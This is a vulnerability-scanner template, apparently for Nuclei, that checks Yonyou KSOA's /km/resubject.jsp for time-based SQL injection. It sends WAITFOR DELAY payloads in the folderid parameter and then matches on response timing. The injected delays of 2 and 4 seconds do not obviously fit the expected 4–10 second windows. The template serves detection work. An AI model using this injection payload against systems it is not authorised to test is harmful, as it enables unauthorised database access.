id: youyouKSOA-resubject-sql

info:
  name: 用友时空KSOA resubject 存在sql注入漏洞
  author: youyouKSOA
  severity: high
  tags: youyouKSOA

http:
  - raw:
      - |+
        GET /km/resubject.jsp?folderid=';WAITFOR+DELAY+'0:0:2'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0


      - |+
        GET /km/resubject.jsp?folderid=';WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0

    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 500
          - 302
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<6'  
          - 'duration_2>=8 && duration_2<10'
        condition: and
